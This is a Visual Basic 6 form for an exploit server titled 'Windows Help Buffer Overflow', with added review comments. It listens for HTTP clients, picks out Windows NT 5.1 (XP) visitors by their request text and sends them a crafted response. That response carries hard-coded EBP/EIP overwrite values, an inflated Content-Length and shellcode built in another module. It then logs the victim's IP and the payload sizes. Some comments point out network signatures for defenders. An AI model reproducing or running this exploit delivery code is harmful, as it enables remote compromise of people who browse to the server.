VERSION 5.00
Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "mswinsck.ocx"
Begin VB.Form Form1
Caption = "Windows Help Buffer Overflow"
ClientHeight = 4965
ClientLeft = 60
ClientTop = 345
ClientWidth = 7200
Icon = "Form1.frx":0000
LinkTopic = "Form1"
ScaleHeight = 4965
ScaleWidth = 7200
StartUpPosition = 3 'Windows Default
Begin VB.TextBox Text2
Height = 285
Left = 1440
TabIndex = 3
Text = "80"
Top = 4560
Width = 855
End
Begin VB.CommandButton Command1
Caption = "Listen"
Height = 255
Left = 2760
TabIndex = 1
Top = 4560
Width = 1695
End
Begin VB.TextBox Text1
Height = 4455
Left = 120
MultiLine = -1 'True
ScrollBars = 3 'Both
TabIndex = 0
Text = "Form1.frx":0442
Top = 0
Width = 6975
End
Begin MSWinsockLib.Winsock tcp
Index = 0
Left = 6720
Top = 4560
_ExtentX = 741
_ExtentY = 741
_Version = 393216
End
Begin VB.Label Label1
Caption = "Http server port:"
Height = 255
Left = 120
TabIndex = 2
Top = 4560
Width = 1215
End
End
Attribute VB_Name = "Form1"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Private Sub Command1_Click()
    ' "Listen" button handler: loads the next element of the tcp() Winsock
    ' control array, sets its local port from the Text2 box and starts
    ' listening, then resets the log box and disables the button so the
    ' listener is only started once per run.
    ' NOTE(review): NbSck is not declared in this file; presumably a
    ' project-level counter declared in another module - confirm.
    ' NOTE(review): no error handler is installed here, so a non-numeric
    ' or already-used port is expected to surface as a run-time error.
    NbSck = NbSck + 1
    Load tcp(NbSck)
    With tcp(NbSck)
        .LocalPort = Text2.Text
        .Listen
    End With
    Text1.Text = "Listening on port " & Text2.Text & vbCrLf & "------------" & vbCrLf
    Command1.Enabled = False
End Sub
Private Sub Form_Load()
    ' Resets the socket counter when the form loads; index 0 is the
    ' design-time tcp element declared in the form layout (Index = 0).
    ' NOTE(review): NbSck is declared outside this file - confirm its
    ' scope and type in the project's other modules.
    NbSck = 0
End Sub
Private Sub tcp_ConnectionRequest(Index As Integer, ByVal requestID As Long)
    ' Incoming-connection handler: every request gets its own freshly
    ' loaded tcp() element, which then accepts the pending connection.
    ' Index identifies the listening element that raised the event and is
    ' not used here.
    ' NOTE(review): errors from Load/Accept are suppressed by the
    ' Resume Next below, and no element is ever unloaded in this file,
    ' so the control array only grows while the form is open.
    On Error Resume Next

    NbSck = NbSck + 1
    Load tcp(NbSck)
    Call tcp(NbSck).Accept(requestID)
End Sub
Private Sub tcp_DataArrival(Index As Integer, ByVal bytesTotal As Long)
' Data-arrival handler for an accepted connection. It appends whatever the
' client sent to the on-screen log (Text1), looks for a Windows NT 5.1
' marker in that log and, when found, answers with a fixed HTTP 200
' response whose body is Html_Page.
'
' Index      - element of the tcp() control array that received the data.
' bytesTotal - byte count supplied by the Winsock control; not used here.
'
' NOTE(review): EBP, EIP, Buffer, Html_Page, ShellCode, ShellCodeFrst and
' Buildin_The_BuFFer are not defined in this file; presumably they live in
' another module of the project - confirm before relying on any size or
' content described below.
'
' Defender-relevant constants visible in this handler: the literal
' "Server: Evil." header, the fixed "Date: Thu, 03 Oct 2002 17:57:10 GMT"
' header, a blank line sent before the status line, and a Content-Length
' that is Len(Buffer) + 10000 rather than the length of a measured body.
' These are stable across responses and can serve as network signatures
' for this specific tool.
Dim Data As String
' Local flag; it is False on every call until the marker check succeeds.
Dim Send_It As Boolean
tcp(Index).GetData Data
' Everything received is accumulated into the shared log text box.
Text1 = Text1 + Data
' Substring check on the accumulated log, not only on this request.
' NOTE(review): presumably meant to match "Windows NT 5.1" in the
' client's User-Agent header - confirm; any request containing the
' substring triggers the response.
If InStr(Text1, "indows NT 5.1") Then
' Replace the log with a short summary of the matching client.
Text1 = "Client: " + tcp(Index).RemoteHostIP + vbCrLf + "Windows Version: NT 5.1" + vbCrLf + "-----------------------------"
' Two hard-coded 4-byte strings assigned to externally declared names.
EBP = Chr(19) + Chr(216) + Chr(36) + Chr(17)
EIP = Chr(84) + Chr(200) + Chr(19) + Chr(0)
' The four bytes above are 0x0013c854 written least-significant byte first.
'0x0013c854
' External routine; presumably assembles Buffer / Html_Page - confirm.
Buildin_The_BuFFer
Send_It = True
End If
If Send_It Then
' 7 is sckConnected in the Winsock control's state enumeration; nothing
' is sent if the client has already dropped the connection.
If tcp(Index).State = 7 Then
' The response starts with a CRLF ahead of the status line.
tcp(Index).SendData vbCrLf + "HTTP/1.1 200 OK" + vbCrLf
' Advertised length is Len(Buffer) plus a fixed 10000, not the size of
' the Html_Page that is actually sent below.
tcp(Index).SendData "Content-Length: " + Str(Len(Buffer) + 10000) & vbCrLf
tcp(Index).SendData "Server: Evil." & vbCrLf
tcp(Index).SendData "Date: Thu, 03 Oct 2002 17:57:10 GMT" & vbCrLf
tcp(Index).SendData "Content-Type: text/html" & vbCrLf
tcp(Index).SendData "Connection: Keep-Alive" + vbCrLf
' Empty line terminating the header section.
tcp(Index).SendData vbCrLf
tcp(Index).SendData Html_Page
' Operator-facing log lines: recipient address and the sizes of the
' externally built strings.
Text1 = Text1 + vbCrLf + "buffer has been sent to " + tcp(Index).RemoteHostIP + vbCrLf
Text1 = Text1 + "Buffer Size Was: " + Str(Len(Buffer)) + " bytes." + vbCrLf
Text1 = Text1 + "First ShellCode size was: " + Str(Len(ShellCodeFrst)) + " bytes." + vbCrLf
Text1 = Text1 + "Shellcode Size was: " + Str(Len(ShellCode)) + " bytes." + vbCrLf
End If
End If
End Sub
Private Sub Text1_DblClick()
    ' Double-clicking the log box clears it. Because tcp_DataArrival
    ' searches this same text for its trigger marker, clearing the box
    ' also discards any request data accumulated so far.
    Text1.Text = ""
End Sub